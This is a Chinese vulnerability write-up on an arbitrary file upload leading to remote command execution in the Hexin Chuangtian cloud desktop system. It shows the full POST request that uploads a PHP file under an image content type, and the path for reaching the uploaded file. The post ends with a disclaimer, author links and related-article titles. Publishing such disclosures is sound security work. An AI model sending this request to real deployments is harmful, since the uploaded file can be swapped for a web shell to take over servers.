和信创天云桌面系统远程命令执行
若天下不定,吾往;若世道不平,不回!
漏洞描述
和信创天云桌面系统存在默认配置导致文件上传并可以远程命令执行
漏洞影响
和信创天云桌面系统
漏洞复现
构造payload
POST /Upload/upload_file.php?l=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 180
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/avif
<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--
访问
https://xxx.xxx.xxx/Upload/1/1.php
漏洞证明
漏洞利用poc
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社区:
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
和信创天云桌面系统远程命令执行相关推荐
- 和信创天云桌面系统远程命令执行 RCE漏洞复现渗透测试
前言 和信创天云桌面系统,官方介绍,市场上主要有华为.深信服.锐捷.和信创天四大云桌面厂商,华为从网络设备的角度打造整体解决方案,深信服从安全的角度切入云桌面,锐捷主打针对教育行业的云课堂业务,但前三 ...
- 【漏洞复现】和信创天云桌面系统—任意文件上传
简介 和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计 ...
- 和信创天云桌面系统VENGD文件上传漏洞复现
1.漏洞概述 和信创天下一代云桌面系统融合了VDI.VOI.IDV三大架构优势的云桌面产品,实现了前后端混合计算,兼顾移动办公和窄带环境下3D高清播放和外设硬件全兼容,满足大规模终端的管理.安全.运维 ...
- 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执 ...
- 查看云服务器系统的命令,查看云服务器系统的命令
查看云服务器系统的命令 内容精选 换一换 使用MSTSC方式登录Windows Server 2008操作系统的云服务器,系统报错:检测到一个协议错误(代码 0x1104).服务端安全组3389端口未 ...
- 查看云服务器系统的命令,查看云服务器系统的命令行
查看云服务器系统的命令行 内容精选 换一换 网站的访问与云服务器的网络配置.端口通信.防火墙配置.安全组配置等多个环节相关联.任意一个环节出现问题,都会导致网站无法访问.本节操作介绍网站无法访问时的排 ...
- 服务器的系统信息命令 厂家,查看云服务器系统的命令行
查看云服务器系统的命令行 内容精选 换一换 简要介绍Lua是一种轻量小巧的脚本语言,用标准C语言编写并以源代码形式开放, 其设计目的是为了嵌入应用程序中,从而为应用程序提供灵活的扩展和定制功能.语言: ...
- 深信服 行为感知系统 c.php 远程命令执行漏洞
漏洞描述: 深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 漏洞利用条件: / 漏洞影响范围: 行为感知系统 漏洞复现: 1.POC:/tool/log ...
- 命令执行漏洞之远程命令执行和系统命令执行
渗透学习 命令执行漏洞 文章目录 渗透学习 前言 *本文只做学习用途,严禁利用本文提到的技术进行非法攻击,否则后果自负,本人不承担任何责任.* 一.命令执行漏洞概述 二.实验步骤 1.管道符号 2.远 ...
最新文章
- 雅思作文未来计算机的应用,9分考官级雅思大作文范文之电脑技术的忧虑
- P4503-[CTSC2014]企鹅QQ【字符串hash】
- Python 调试冷知识
- NYOJ 3:多边形重心问题
- java中线程的生命周期_Java中的线程生命周期– Java中的线程状态
- 基于OSSIM平台的信息系统安全风险评估实施指南
- oracle分区表 mysql_Oracle分区表的使用和管理
- BCDboot 命令行选项
- Linux下tomcat修改端口(80)
- 唐人笔+手写板连接到计算机usb端口+错误,汉王唐人笔如意驱动
- vue组件库,插件大全
- 物联网应用开发实践案例-智能家居
- 站队(使用插入排序完成) (Standard IO)————c++插入排序
- 48搜索相关参数梳理以及bouncing results问题解决方案
- 2022年女性精致美学白皮书
- 关于DES加密强制更新版(4.22)
- [Matlab]LMS滤波器设计
- C语言零基础入门之“hello world“
- bootstrap-5.3.0 里面A标签去除下划线有几种办法
- 学习Python中turtle模块的基本用法(3:学习绘图示例源码)